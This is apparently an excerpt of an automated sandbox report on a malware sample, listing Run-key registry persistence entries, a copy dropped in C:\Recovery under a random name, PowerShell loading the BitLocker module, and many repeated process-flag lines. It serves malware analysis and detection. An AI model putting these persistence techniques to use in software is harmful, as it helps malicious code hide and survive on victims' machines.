Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchApp	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
